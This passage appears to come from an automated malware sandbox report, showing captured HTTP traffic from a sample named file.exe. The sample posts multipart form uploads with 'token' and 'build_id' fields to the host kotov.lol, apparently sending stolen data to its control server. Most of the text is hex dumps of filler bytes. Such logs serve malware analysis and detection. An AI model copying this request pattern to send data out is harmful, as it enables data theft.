                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:44 UTC158INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:44 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    24192.168.2.44977295.217.25.2284436976C:\Users\user\Desktop\file.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:45 UTC319OUTPOST / HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECA
                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                    Host: kotov.lol
                                                                                                                    Content-Length: 131557
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-11-30 10:34:45 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 33 64 37 32 30 30 66 65 33 35 39 31 65 65 30 39 39 35 39 37 33 32 37 31 39 65 37 31 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 35 62 61 33 63 32 35 66 61 37 62 38 30 31 31 32 33 34 61 64 30 39 64 37 37 62 36 33 34 66 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74
                                                                                                                    Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="token"63d7200fe3591ee09959732719e71375------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="build_id"c5ba3c25fa7b8011234ad09d77b634f1------KEHDHIDAEHCFHJJJJECACont
                                                                                                                    2024-11-30 10:34:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:45 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:47 UTC158INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:47 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    2024-11-30 10:34:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    25192.168.2.44977395.217.25.2284436976C:\Users\user\Desktop\file.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:46 UTC320OUTPOST / HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH
                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                    Host: kotov.lol
                                                                                                                    Content-Length: 6990993
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-11-30 10:34:46 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 33 64 37 32 30 30 66 65 33 35 39 31 65 65 30 39 39 35 39 37 33 32 37 31 39 65 37 31 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 35 62 61 33 63 32 35 66 61 37 62 38 30 31 31 32 33 34 61 64 30 39 64 37 37 62 36 33 34 66 31 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74
                                                                                                                    Data Ascii: ------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="token"63d7200fe3591ee09959732719e71375------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="build_id"c5ba3c25fa7b8011234ad09d77b634f1------CFCBFBGDBKJKECAAKKFHCont
                                                                                                                    2024-11-30 10:34:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
